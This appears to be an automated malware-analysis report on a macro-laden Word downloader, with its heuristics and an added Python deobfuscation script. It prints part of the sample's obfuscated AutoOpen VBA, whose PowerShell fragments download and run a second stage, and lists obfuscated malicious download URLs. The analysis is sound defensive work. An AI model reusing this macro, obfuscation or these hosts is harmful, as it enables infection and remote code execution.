MALICIOUS
Risk Score: 242

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
- T1203 Exploitation for Client Execution
The critical OLE_VBA_SHELL heuristic fired, indicating a Shell() call in the VBA macros. An AutoOpen macro is present: after a block of junk arithmetic statements whose runtime errors are swallowed by On Error Resume Next, it calls Application.Run to start the macro fSQmfuCobEd (not within the preview) with the value returned by LdHBjfUP(), so execution begins as soon as the document is opened. LdHBjfUP() cuts its payload out of junk-padded string literals with Mid(), and the pieces visible in the preview are PowerShell: a -replace chain that turns the placeholder token bTE ([chAR]98+[chAR]84+[chAR]69) back into a single quote ([chAR]39), a foreach loop with a try block around a DownloadFile call, and 7E9PSHOmE[4]+7E9pShOmE[30]+fkaXfka, which with the placeholders resolved (7E9 evidently standing for $) reads $PSHOME[4]+$PSHOME[30]+'X', i.e. ieX (Invoke-Expression) spelled from characters of the PowerShell install path. The macro therefore most likely iterates over the obfuscated URLs in the evidence, downloads a second-stage payload from the first one that answers, and executes it. Nothing in the heuristic evidence supports the T1203 mapping: every finding points at macro execution, not at exploitation of a parser vulnerability, and the WordBasic finding explicitly disclaims parser-CVE attribution. That same finding's statement that no VBA project was recovered is contradicted by the extracted macros.bas below and should not be relied on.
Heuristics (7)

- ClamAV: Img.Dropper.PhishingLure-6443153-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA [critical] OLE_VBA_SHELL: Shell() call in VBA
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. The first three URLs below still carry the macro's bTE+bTE / fka+fka string-splitting tokens and are the download candidates; the last one is the standard DrawingML XML namespace and is not an indicator.
  - http://www.floridalakebTE+bTEfbTE+bTEront.bTE+bTEprbTE+bTEopertibTE+bTEes/etfka+fkaNMp/ (in document text, OLE body)
  - https://ilog3bTE+bTE6bTE+bTE0.com/xfbTE+bTEL0m/ (in document text, OLE body)
  - http://maciani.cbTE+bTEomb (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 72393 bytes |

SHA-256: e28fa2f831c61e51528cfa948b25335e61c221ffaf055136506e27c503391c50
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "dAPlfPBXIaNuUR"
Sub AutoOpen()
On Error Resume Next
TBjMpIaKd = 871 / Rnd(4) + hwYQGEQiJ + wiWVouNFJtmXuB * 9 + Int(PzzbOvvwhqXFM * CStr(uOZtiQoiK)) + vuVAjbKCWa * CDate(3624 - 352183467 * 84 / 475) / FQDvEDiofRpAr - CSng(620)
PfNdMkBko = 871 / Rnd(4) + jTZvMGjUilW + zWwdNGpfFFtdk * 9 + Int(NjpmZGR * CStr(WciIViwzHPVai)) + fiWuuIWaZvKJs * CDate(3624 - 352183467 * 84 / 475) / ivMPXIzVzFlHjI - CSng(620)
wiIKVWBHP = 871 / Rnd(4) + MISwCizMpzS + DFCZrJjR * 9 + Int(ncOcumzn * CStr(wXjhDPqDTQ)) + YShqmaDI * CDate(3624 - 352183467 * 84 / 475) / irXwUYjETHvwZS - CSng(620)
AufWBnjoq = 871 / Rnd(4) + JlUuXpTjr + sGzhMiimjLUIz * 9 + Int(jvHEBVNpBEojEl * CStr(inMHiatvzJX)) + wFizAlU * CDate(3624 - 352183467 * 84 / 475) / chPhWdCFu - CSng(620)
scawGFXHB = 871 / Rnd(4) + ZmAJviQQk + FnzjYDwYil * 9 + Int(XoAEjwH * CStr(AHrzVvabXTDFN)) + jpFfqYCIz * CDate(3624 - 352183467 * 84 / 475) / QMBwAFOhJZk - CSng(620)
Application.Run "fSQmfuCobEd", LdHBjfUP
POocnzcYE = 871 / Rnd(4) + frFEKzBGior + OjIucbSF * 9 + Int(woiUbQCCba * CStr(uCkVvtpFMbak)) + HzFTtVAFzEjDX * CDate(3624 - 352183467 * 84 / 475) / jizDHOHNLznw - CSng(620)
imMsuVDpM = 871 / Rnd(4) + LiJFZivzASY + GXNXSWlt * 9 + Int(FfvnOsGJNAhXH * CStr(QuCocSOwVa)) + fpfWDjETnF * CDate(3624 - 352183467 * 84 / 475) / NSLlonm - CSng(620)
SqlwAzdQh = 871 / Rnd(4) + aZHKVNiC + nKTdEURNjjd * 9 + Int(iaLDjohpitmwv * CStr(OwssEciNAcwNj)) + jjzjDRwwvGl * CDate(3624 - 352183467 * 84 / 475) / BNstYUhMFS - CSng(620)
UofBIQajF = 871 / Rnd(4) + HCGwwFvivP + mHiaVVG * 9 + Int(dfUYQPJ * CStr(CJjYMBO)) + zGtzSZDQq * CDate(3624 - 352183467 * 84 / 475) / hjAbmuTib - CSng(620)
rmdqjmDsV = 871 / Rnd(4) + qplsMbPbI + EcDiAhcBbWlF * 9 + Int(aXfVQKKOjiCz * CStr(wonzXTKtWOj)) + pBKCRwdlHLUhGz * CDate(3624 - 352183467 * 84 / 475) / wXXuBiZln - CSng(620)
End Sub
Function LdHBjfUP()
On Error Resume Next
ztLjzVsV = 871 / Rnd(4) + zYddAKKt + qLzXXEhzQklHs * 9 + Int(StoKqjCYlWwQt * CStr(FcvWstqfjmsVAd)) + icCFjKk * CDate(3624 - 352183467 * 84 / 475) / zUKqRZba - CSng(620)
mzAJhQ = 871 / Rnd(4) + qJwLQIPmBzm + NKjEdznE * 9 + Int(kcLYjQidlWEjtq * CStr(ufZJazaRR)) + tFkGOSXjdFh * CDate(3624 - 352183467 * 84 / 475) / mhrhJPahcUTO - CSng(620)
oppMC = Mid("CvEmtd37nXvnLCGQk3),[chA'+'R]124'+' -REpLACe([c'+'hAR]98+[chAR]84+[chAR]69),[chAR]39-REpLACe fkaEl4fka,[chAR]36))').REPLacE(([Char]55+[Char]69+[CXcY", 18, 128)
EQaAiW = 871 / Rnd(4) + LntopPOz + mKBSUjZ * 9 + Int(CttKNiVQwB * CStr(CZFILlKMjPtN)) + GiXaLhzbRwWhh * CDate(3624 - 352183467 * 84 / 475) / zEYYsNfwchCpjK - CSng(620)
qQzcC = 871 / Rnd(4) + XjNNDJmUZC + wNiYWpkwCswKKs * 9 + Int(wbFUizhaFkQzU * CStr(NdCIswA)) + qlrNwibbYDVNNK * CDate(3624 - 352183467 * 84 / 475) / EYARncnGr - CSng(620)
TDHSrdXpLkS = 871 / Rnd(4) + qFJjFEjKvE + CHkciaipN * 9 + Int(KrAAIJCq * CStr(VBpEbqNBbr)) + ucTiKYLzw * CDate(3624 - 352183467 * 84 / 475) / LqzOfOIjzuj - CSng(620)
WwSthtI = Mid("mzOCni3cTEeJlz;foreachfka+fka(IfPabfka+fkac in'+' bTE+bTEIfbTE+bTEPbcd){bTE+bTEtbTE+bTEry{IbTE+bTEfPfranbTE+bTEcfka+f'+'ka.DownlobTE+bTEadFil'+'e(IfP'+'abbTE+bTEcYmvYSipN", 9, 154)
WFrEHWBNtln = 871 / Rnd(4) + wpPuCRtpz + TdQACwiMNcHp * 9 + Int(NzjrjMU * CStr(fzwApMh)) + lbYNZvbIAO * CDate(3624 - 352183467 * 84 / 475) / wbsPHGmBwTZNc - CSng(620)
idiVw = 871 / Rnd(4) + UTpWUROub + KdSrYiFB * 9 + Int(trbozzbl * CStr(VXAGqfkpSiaK)) + OzCdnUwUFGYYw * CDate(3624 - 352183467 * 84 / 475) / tfrXtjcZEJ - CSng(620)
UTdqnJqtrmW = 871 / Rnd(4) + ioiSANmzqcB + bdSWbrRXVamj * 9 + Int(tDKkCLNviqGwp * CStr(BCBlQOYfIiasiv)) + JIBucGJ * CDate(3624 - 352183467 * 84 / 475) / MnRnntnLZlr - CSng(620)
jSXbSqnmmzs = Mid("LbpVCo7UvXmj (' . ( 7E9PSHOmE[4]+7E9pShOmE[30]+fkaXfka) (((fka(bTEIf'+'Pfranc = nYS5ki8fBhO8SkA", 13, 69)
IuNcWprVT = 871 / Rnd(4) + mnHiPab + AdbmTLG * 9 + Int(RPRchrHqKbHji * CStr(ovta
... (truncated)
```
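The following is an added example written for this page; it is not part of the analyzer report or of the sample. It statically reproduces what the macro's own code does to its strings: the VBA Mid() calls cut each real fragment out of a junk-padded literal, and the resulting PowerShell carries three kinds of splits that the script removes at runtime: the `'+'` breaks that are already visible in the VBA literals, the placeholder tokens that a `-replace` turns back into a single quote (`bTE`, taken from the `[chAR]98+[chAR]84+[chAR]69 ... [chAR]39` fragment; `fka` is treated the same way because it wraps literals and splits identically, which is an inference from usage), and the `7E9` token in front of `PSHOmE[4]`, which is assumed to become `$` because the `.REPLacE(([Char]55+[Char]69+...` call is cut off in the preview. The `$PSHOME` value is the default Windows PowerShell 5.1 install directory and is used only to resolve the character-indexing trick. The three Mid() arguments and the URL strings are copied from the evidence above; the identifiers that remain after decoding (for example `IfPfranc`) are still obfuscated by a substitution that is not within the preview.

```python
"""Added example (not from the report or the sample): static recovery of the
Mid()-extracted, placeholder-split PowerShell fragments shown in the preview.
"""
import re

# Placeholder -> character. bTE comes from the sample's own
# -REpLACe([chAR]98+[chAR]84+[chAR]69),[chAR]39; fka is inferred from how it
# wraps literals (fkaXfka); 7E9 -> '$' is an ASSUMPTION, the replacement value
# in .REPLacE(([Char]55+[Char]69+... is cut off in the preview.
PLACEHOLDERS = {"bTE": "'", "fka": "'", "7E9": "$"}

# Default Windows PowerShell 5.1 $PSHOME; only used to evaluate $PSHOME[n].
PSHOME = r"C:\Windows\System32\WindowsPowerShell\v1.0"

# The three Mid() calls exactly as they appear in the extracted macro preview.
MID_CALLS = [
    ("CvEmtd37nXvnLCGQk3),[chA'+'R]124'+' -REpLACe([c'+'hAR]98+[chAR]84+[chAR]69),[chAR]39-REpLACe fkaEl4fka,[chAR]36))').REPLacE(([Char]55+[Char]69+[CXcY", 18, 128),
    ("mzOCni3cTEeJlz;foreachfka+fka(IfPabfka+fkac in'+' bTE+bTEIfbTE+bTEPbcd){bTE+bTEtbTE+bTEry{IbTE+bTEfPfranbTE+bTEcfka+f'+'ka.DownlobTE+bTEadFil'+'e(IfP'+'abbTE+bTEcYmvYSipN", 9, 154),
    ("LbpVCo7UvXmj (' . ( 7E9PSHOmE[4]+7E9pShOmE[30]+fkaXfka) (((fka(bTEIf'+'Pfranc = nYS5ki8fBhO8SkA", 13, 69),
]

# The macro-reached URLs as the report extracted them (third one is cut off
# in the report, so its tail is not trustworthy).
OBFUSCATED_URLS = [
    "http://www.floridalakebTE+bTEfbTE+bTEront.bTE+bTEprbTE+bTEopertibTE+bTEes/etfka+fkaNMp/",
    "https://ilog3bTE+bTE6bTE+bTE0.com/xfbTE+bTEL0m/",
    "http://maciani.cbTE+bTEomb",
]


def vba_mid(s, start, length):
    """VBA Mid(): 1-based start, at most `length` characters."""
    return s[start - 1:start - 1 + length]


def deobfuscate(s):
    """Undo the splits layer by layer until nothing changes.

    The order mirrors the sample: the outer string is concatenated first (its
    '+' splits vanish), then -replace restores the quotes, and the result is
    evaluated again, which joins the newly exposed '+' splits. Each pass either
    shortens the string or leaves it unchanged, so the loop terminates.
    """
    prev = None
    while s != prev:
        prev = s
        s = s.replace("'+'", "")  # 'ab'+'cd' is just 'abcd'
        for token, char in PLACEHOLDERS.items():
            s = s.replace(token, char)
    return s


# $PSHOME[n]+$PSHOME[m]+'lit' ... : characters of the install path joined with
# literals, the usual way to spell iex without the string appearing anywhere.
_PSHOME_EXPR = re.compile(
    r"\$pshome\[\d+\](?:\+(?:\$pshome\[\d+\]|'[^']*'))*", re.IGNORECASE)
_TERM = re.compile(r"\$pshome\[(\d+)\]|'([^']*)'", re.IGNORECASE)


def resolve_pshome_alias(s):
    """Evaluate the first $PSHOME-indexing expression in s, or None."""
    m = _PSHOME_EXPR.search(s)
    if not m:
        return None
    parts = []
    for t in _TERM.finditer(m.group(0)):
        parts.append(PSHOME[int(t.group(1))] if t.group(1) is not None else t.group(2))
    return "".join(parts)


def recover_fragments():
    """Apply Mid() as the macro does, then strip the splits."""
    return [deobfuscate(vba_mid(s, start, length)) for s, start, length in MID_CALLS]


def recover_urls():
    return [deobfuscate(u) for u in OBFUSCATED_URLS]


if __name__ == "__main__":
    frags = recover_fragments()
    for frag in frags:
        print(repr(frag))
    for url in recover_urls():
        print(url)
    print("invoke alias:", resolve_pshome_alias(frags[2]))
```

Running it shows the junk prefixes and suffixes being exactly what Mid() discards, the `-replace` chain (including a further `'El4'` to `[chAR]36`, i.e. `$`, substitution that the preview does not show being applied), the `foreach(... in ...){try{....DownloadFile(` loop, the reassembled URLs, and `ieX` as the resolved invoke alias. Because every real fragment is pulled from the middle of a literal by Mid(), grepping the raw VBA for `http` or `iex` finds nothing; decoding the Mid() calls is the step that makes the fragments searchable.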